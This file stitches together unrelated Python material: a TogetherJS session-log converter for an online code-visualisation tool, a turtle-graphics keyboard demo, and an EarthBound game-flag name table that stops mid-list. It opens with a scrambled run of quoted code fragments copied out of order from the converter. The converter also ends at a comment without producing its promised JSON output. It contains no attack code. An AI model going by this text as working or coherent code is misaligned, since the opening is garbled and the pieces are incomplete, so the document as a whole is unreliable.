tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t']", "'#8d549f'} # not sure if this is necessary # TODO: we need to", "copies if there are more people in the session). 
# the easiest way", "editor contains those contents when they execute ''' from collections import defaultdict import", "if rec['type'] != 'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type'] if typ", "GENERATE TRACES FOR THE CACHE; IF THE CODE IS MALICIOUS, THEN IT WILL", "this is to run the code on the actual server to generate a", "a real trace for the trace cache; we need to essentially create a", "'d' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec = json.loads(line) if rec['type']", "and tjs['clientId'] != firstClientId: continue # ...do the same with hashchange: log them", "and firstClientId and tjs['clientId'] != firstClientId: continue # ...do the same with hashchange:", "raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue", "myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while running\", myAppState,", "we know that the code in the editor contains those contents when they", "usernames for us ... # # Key: clientId, Value: current username (might change", "= serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while running\", myAppState, '->',", "# sanity check: note that this will fail if we have multiple #", "this since TogetherJS will take care of # mapping clientId's to usernames for", "to usernames for us ... # # Key: clientId, Value: current username (might", "continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode", "the solution to this is to run the code on the actual server", "e in raw_events: tjs = e['togetherjs'] # clean up and append to final", "those contents when they execute ''' from collections import defaultdict import dateutil.parser import", "N times if there are N people in the session) since TogetherJS logs", "python-based driver (maybe using requests) to make the proper calls to the various", "HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL", "# milliseconds # prepend a special app.startRecordingDemo event to events startRecordingDemoEvent = {'type':", "this event! # add these fields to match codcast format tjs['ts'] = ms", "firstInitialAppState = None firstClientId = None raw_events = [] # Key: delta 'd'", "firstEditTimestamp <= t assert t - firstEditTimestamp < 5000 # give it a", "hands for nows. NB: one big challenge is that some types of events", "proper calls to the various OPT backends, depending on language TODOs: - not", "events, look up who the ORIGINAL PERSON was who # initiated this edit", "continue # get outta here! events = [] for e in raw_events: tjs", "YOUR COMPUTER!!! 
- the solution to this is to run the code on", "events are DEFINITELY duplicated - app.hashchange events might also be duplicated - maybe", "import dateutil.parser import json import os import sys import time from call_opt_backend import", "raw_events = [] # Key: delta 'd' field, value: list of code edit", "rec['togetherjs'] typ = tjs['type'] if typ not in ALL_LEGIT_TYPES: continue # read only", "events: if typ == 'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's", "a special app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts':", "timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look", "= e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace' in", "# # NB: this won't be fully accurate if there are several *independent*", "actions separately - app.editCode events are DEFINITELY duplicated - app.hashchange events might also", "to record only editCode events belonging # to the firstClientId user and discard", "throw up our hands for nows. NB: one big challenge is that some", "assert firstEditTimestamp <= t assert t - firstEditTimestamp < 5000 # give it", "it a 5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] # change the", "clientId, Value: current username (might change throughout the # session; keep the latest", "final events dt = dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms = int(time.mktime(dt.timetuple()))", "json.loads(line) if rec['type'] != 'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type'] if", "SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE", "if we have multiple # identical sets of edits that take place at", "in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that", "to the firstClientId user and discard all other ones. if typ == 'app.editCode'", "keep the latest one) clientIdtoUsername = {} firstInitialAppState = None firstClientId = None", "t assert t - firstEditTimestamp < 5000 # give it a 5-second buffer", "app.codeEdit events, look up who the ORIGINAL PERSON was who # initiated this", "EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE CODE", "= firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs =", "turns it into the codcast format, which is readable by # ../js/recorder.ts and", "later on; or maybe just add it here?!? 
# this script converts a codechella session log recorded by
# ../../v3/opt_togetherjs/server.js
# ... and ../js/demovideo.ts
#
# writes JSON output to stdout
# created: 2018-05-27

'''
NB: now that i think about it more, it's not entirely clear to me whether
we can tell who initiated an app.editCode event with any kind of
certainty. oh wells, ...

one big challenge is that some types of events are duplicated (or repeated
N times if there are N people in the session) since TogetherJS logs
everyone's actions separately
- app.editCode events are DEFINITELY duplicated
- app.hashchange events ... be duplicated - maybe ONLY take hashchange
  events for YOURSELF?

HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY
EXECUTE THE CODE VERBATIM TO GENERATE the trace cache. IF THE CODE IS
MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!!
- the solution to this is to run the code on the actual server to generate
  the trace cache; we need to essentially create a python-based driver
  (maybe using requests) to make the proper calls to the various OPT
  backends, ...

not sure how much hashchange events matter - maybe we can use
app.executeCode events as 'sync points' since we know that the code in the
editor contains those contents when they execute
'''

from collections import defaultdict
import dateutil.parser
import json
import os
import sys
import time
from call_opt_backend import call_opt_backend

# somewhat modeled after ../js/demovideo.ts

ALL_LEGIT_TYPES = ('app.initialAppState', 'app.editCode', 'app.executeCode',
                   'hashchange')

firstInitialAppState = None
firstClientId = None
raw_events = []

#
# Key: clientId, Value: current username (might change throughout the
# session)

# Key: delta 'd' field, value: list of code edit events with that same 'd'
#
# NB: this won't be fully accurate if there are several *independent*
# sets of edits occurring at vastly different times which have the same 'd'
all_code_edits_by_deltas = defaultdict(list)

for line in open(sys.argv[1]):
    rec = json.loads(line)
    if rec['type'] != 'togetherjs':
        continue
    tjs = rec['togetherjs']
    typ = tjs['type']
    if typ not in ALL_LEGIT_TYPES:
        continue

    # read only the FIRST initialAppState since we'll assume that user
    # initiated the session
    if not firstInitialAppState and typ == 'app.initialAppState':
        firstInitialAppState = rec
        firstClientId = tjs['clientId']

    # don't append any initialAppState events:
    if typ == 'app.initialAppState':
        continue

    if typ == 'app.editCode':
        all_code_edits_by_deltas[tjs['delta']['d']].append(tjs)

    # editCode events are duplicated (or even more copies if there are more
    # people in the session). the easiest way to manage it is to record only
    # editCode events belonging to the firstClientId user and discard all
    # other ones.
    if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId:
        continue

    # ...do the same and keep hashchange events only for the firstClientId user
    if typ == 'hashchange' and firstClientId and tjs['clientId'] != firstClientId:
        continue

    raw_events.append(rec)
    # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']:
    #     assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t']
    #     continue # get outta here!

events = []
for e in raw_events:
    tjs = e['togetherjs']
    # clean up and append to final events
    dt = dateutil.parser.parse(e['date'])
    # get timestamp in milliseconds
    ms = int(time.mktime(dt.timetuple())) * 1000

    # for app.codeEdit events, look up who the ORIGINAL PERSON to initiate
    # this edit was ... event, and log their clientId, which may be
    # different than your own clientId
    if tjs['type'] == 'app.editCode':
        d = tjs['delta']['d']
        t = tjs['delta']['t']
        assert d in all_code_edits_by_deltas
        firstEdit = all_code_edits_by_deltas[d][0]
        firstEditTimestamp = firstEdit['delta']['t']
        # this won't be fully accurate if there are several *independent*
        # sets of edits that take place at vastly
        # different points in time, but let's cross that bridge when
        # we get to it
        assert firstEditTimestamp <= t and t - firstEditTimestamp < 5000 # give it a 5-second buffer for sanity checking
        tjs['clientId'] = firstEdit['clientId']
        tjs['peer'] = {'color': '#8d549f'} # not sure if this is necessary

    # add these fields to match codcast format
    tjs['ts'] = ms
    tjs['sameUrl'] = True

    # TODO: ... we don't need this since TogetherJS will take care of
    # mapping clientId's ... to add frameNum field later on; or maybe just
    # add it here?!?
    events.append(tjs)

# each element of myTraceCache is a pair of [appState, cached trace from server]
myTraceCache = []
for e in events:
    if e['type'] == 'app.executeCode':
        myAppState = e['myAppState']
        r = call_opt_backend(myAppState)
        #print r.url
        serverResultJson = r.json()
        if 'trace' in serverResultJson:
            myTraceCache.append([myAppState, serverResultJson])

initialAppState = firstInitialAppState['togetherjs']['myAppState']
initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it
firstDt = dateutil.parser.parse(firstInitialAppState['date'])
firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds

# prepend a special app.startRecordingDemo event
startRecordingDemoEvent = {'type': 'app.startRecordingDemo',
                           'clientId': firstInitialAppState['togetherjs']['clientId'],
                           'ts': firstTs,
                           'sameUrl': True,
                           'peer': {'color': '#8d549f'}} # not sure if this is necessary
events.insert(0, startRecordingDemoEvent)

# ok finally produce the JSON output
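For context on the import above: the converter only assumes that call_opt_backend() returns a requests-style response object (a .url attribute and a .json() method whose body may contain a 'trace' field). Below is a minimal sketch of such a driver, in the spirit of the docstring's "python-based driver (maybe using requests)" note; the endpoint URL and the 'code' key on myAppState are illustrative assumptions, not confirmed by this file.

# call_opt_backend.py -- a minimal sketch, NOT the real module.
import requests

# Hypothetical backend endpoint; a real OPT deployment may differ.
OPT_BACKEND_URL = 'http://localhost:8003/exec'

def call_opt_backend(my_app_state):
    # Assumption: the shared app state stores the editor contents under
    # 'code'. The converter only needs .url and .json() on the result,
    # which requests.Response provides.
    params = {'user_script': my_app_state.get('code', '')}
    return requests.get(OPT_BACKEND_URL, params=params)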
from turtle import Turtle, Screen

my_turtle = Turtle()
screen = Screen()
my_turtle.shape('arrow')

def forward():
    my_turtle.forward(10)

def backward():
    my_turtle.back(10)

def right():
    my_turtle.right(10)

def left():
    my_turtle.left(10)

def clear_screen():
    my_turtle.penup()
    my_turtle.home()
    my_turtle.clear()
    my_turtle.pendown()

screen.listen()
screen.onkeypress(forward, 'w')
screen.onkeypress(backward, 's')
screen.onkeypress(right, 'd')
screen.onkeypress(left, 'a')
screen.onkeypress(clear_screen, 'c')
screen.exitonclick()
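The five one-line wrappers exist only because Screen.onkeypress() takes a zero-argument callback. An equivalent wiring (same behavior, just a different style) can freeze the step size with functools.partial and register every binding from a dict:

from functools import partial
from turtle import Turtle, Screen

my_turtle = Turtle()
screen = Screen()
my_turtle.shape('arrow')

def clear_screen():
    my_turtle.penup()
    my_turtle.home()
    my_turtle.clear()
    my_turtle.pendown()

# Each key maps to a zero-argument callback; partial() bakes in the step.
bindings = {
    'w': partial(my_turtle.forward, 10),
    's': partial(my_turtle.back, 10),
    'd': partial(my_turtle.right, 10),
    'a': partial(my_turtle.left, 10),
    'c': clear_screen,
}

screen.listen()
for key, action in bindings.items():
    screen.onkeypress(action, key)
screen.exitonclick()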
# Flag names for MOTHER2/Earthbound
# Luckily, every version uses the same flag IDs
FLAG_NAMES = {
    1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5',
    6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10',
    11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE',
    13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS',
    16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY',
    19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY',
    22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS',
    25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS',
    28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS',
    31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2',
    34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK',
    43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ',
    45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL',
    47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED',
    49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON',
    51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE',
    53: 'TALKED_TO_BRICK_ROAD',
    # 54 (Montague at beginning of expanded mine?)
    # 55 (Also related to Montague... AND STONEHENGE??)
    # 56 (Unknown)
    57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN',
    59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE',
    61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT',
    63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED',
    # 65 (???)
    66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED',
    68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED',
    70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED',
    72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED',
    74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED',
    76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP',
    78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE',
    80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE',
    83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS',
    86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE',
    89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA',
    92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP',
    94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME',
    96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC',
    98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN',
    101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI',
    102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK',
    103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text
    104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN',
    # 106 (???)
    107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED',
    109: 'ONETT_COP_DIALOGUE',
    # 110 (???)
    111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID',
    113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN',
    116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID',
    118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER',
    120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND',
    122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT',
    124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR',
    126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe "can search for shyness book"? This flag is set even if you don't talk to Apple Kid
    127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY',
    129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2',
    131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE',
    133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE',
    135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED',
    137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED',
    139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm
    140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT',
    142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI',
    # 144 (Related to Bulldozer at Fourside Bridge?)
    145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER',
    # 150 (Related to Poo's journey)
    151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS',
    153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF',
    155: 'TENDAS_NOT_SHY',
    # 156 (???)
    # 157 (???)
    # 158 (???)
    159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE',
    # 160 (???)
    # 161 (???)
    # 162 (???)
    # 163 (???)
    # 164 (???)
    167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3',
    169: 'PHASE_DISTORTER_V2_BEING_FINISHED',
    # 170 (???)
    171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN',
    173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED',
    # 175 (Unknown. Set when you receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter)
    176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING',
    179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY',
    181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP',
    185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL',
    187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL',
    189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1',
    191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4',
    193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5',
    195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7',
    197: 'CONQUERED_SANCTUARY_8',
    # 198 (Unknown. Set when Paula joins)
    199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE',
    202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE',
    204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD',
    207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD',
    209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED',
    212: 'VISITED_WINTERS', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM',
    217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS',
    219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD',
    221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB',
    223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE',
    224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM',
    # 226 (I hate multipurpose flags)
    # 227 (I hate multipurpose flags)
    # 228 (I hate multipurpose flags)
    # 229 (I hate multipurpose flags)
    # 230 (I hate multipurpose flags)
    # 231 (I hate multipurpose flags)
    # 232 (I hate multipurpose flags)
    242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER',
    244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE',
    246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS',
    248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS',
    250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT',
    252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE',
    254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY',
    256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT',
    257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES',
    260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER',
    262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER',
    264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP',
    266: 'SHOP_SUMMERS_RESTAURANT',
    276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED',
    278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED',
    280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED',
    # 282 (Five moles defeated? How does this differ from 72?)
    # 283 (???)
    284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT',
    # 286 (???)
    288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED',
    291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED',
    293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR',
    295: 'NESS_HOUSE_DOOR_KNOCKING',
    296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room
    297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room
    298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room
    299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY',
    301: 'POKEY_WAITING_AT_DOOR',
    # 302 (???)
    303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME',
    # 305 (???)
    306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI',
    309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH',
    311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED',
    # 313 (... about the Runaway Five Bus?)
    315: 'GHOSTS_BLOCKING_TWOSON',
    # 316 (Unknown. Something about the City Bus?)
    317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM',
    319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER',
    # 320 (???)
    # 321 (Something about Paula's Dad acknowledging the kidnapping)
    322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM',
    324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT',
    326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT',
    328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT',
    330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2',
    332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED',
    334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE',
    336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB',
    338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE',
    # 340 (???)
    341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER',
    346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN',
    348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR',
    351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED',
    353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED',
    355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED',
    357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED',
    359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED',
    361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED',
    363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED',
    365: 'SHARK_AT_ARCADE_ABSENT',
    366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT',
    367: 'SLIMY_LITTLE_PILE_2_DEFEATED',
    # 370 (Unknown. Related to traffic jam?)
    # 371 (???)
    372: 'PARTY_IS_ROBOTIFIED',
    # 373 (Unknown. Related to Boogey Tent)
    374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT',
    # 376 (Unknown. Set after Apple Kid calls you about the Gourmet Yogurt Machine)
    # 377 (???)
    # 378 (???)
    379: 'ANDONUTS_AT_LAB_ABSENT',
    # 380 (???)
    # 381 (???)
    382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT',
    387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED',
    389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED',
    390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this flag and never fights you
    391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't reference this flag and never fights you
    392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED',
    394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED',
    396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED',
    398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED',
    400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED',
    402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED',
    404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED',
    406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED',
    407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED',
    409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED',
    411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED',
    413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED',
    415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED',
    416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED',
